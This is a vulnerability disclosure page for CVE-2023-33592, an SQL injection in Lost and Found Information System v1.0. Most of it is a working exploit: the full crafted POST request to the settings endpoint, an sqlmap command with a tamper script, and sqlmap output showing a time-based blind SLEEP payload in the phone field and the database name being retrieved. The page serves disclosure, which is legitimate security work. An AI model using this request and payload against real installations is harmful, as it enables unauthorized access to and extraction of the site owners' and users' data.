Headline
CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE
Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.
# Exploit Title:Lost and Found Information System v1.0 - Sql Injection # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html # Version: V1.0.0 # Tested on:Linux REQUEST POST /php-lfis/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 454 sec-ch-ua: “;Not A Brand";v="99", “Chromium";v="94” Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: “Linux” Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-lfis/admin/?page=system_info/contact_information Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=fncg346s7j3fr654lsapbb8sqs Connection: close ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="phone” 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="address" test1 ------WebKitFormBoundary2NerUgrr08nxdAqe-- sqlmap -r lfis.txt --random-agent --batch -tamper=space2comment --dbs [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 22:21:18 /2023-05-11/ [22:21:18] [INFO] parsing HTTP request from ‘lfis.txt’ [22:21:18] [INFO] loading tamper module ‘space2comment’ [22:21:18] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’ Multipart-like data found in POST body. Do you want to process it? [Y/n/q] Y [22:21:18] [INFO] resuming back-end DBMS ‘mysql’ [22:21:18] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: — Parameter: MULTIPART phone ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="phone’’’ AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF’=’hBeF ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="address" test ------WebKitFormBoundarydhpsLF47Y6ZvrvP2-- — [22:21:18] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [22:21:18] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.1.17, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [22:21:18] [INFO] fetching database names [22:21:18] [INFO] fetching number of databases [22:21:18] [WARNING] time-based comparison requires larger statistical model, please wait… (done) [22:21:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [22:21:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘–no-cast’ or switch ‘–hex’ [22:21:18] [ERROR] unable to retrieve the number of databases [22:21:18] [INFO] falling back to current database [22:21:18] [INFO] fetching current database [22:21:18] [INFO] resumed: lfis_db available databases [1]: [*] lfis_db [22:21:18] [INFO] fetched data logged to text files under ‘/root/.local/share/sqlmap/output/localhost’ [22:21:18] [WARNING] your sqlmap version is outdated [*] ending @ 22:21:18 /2023-05-11/
Related news
Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.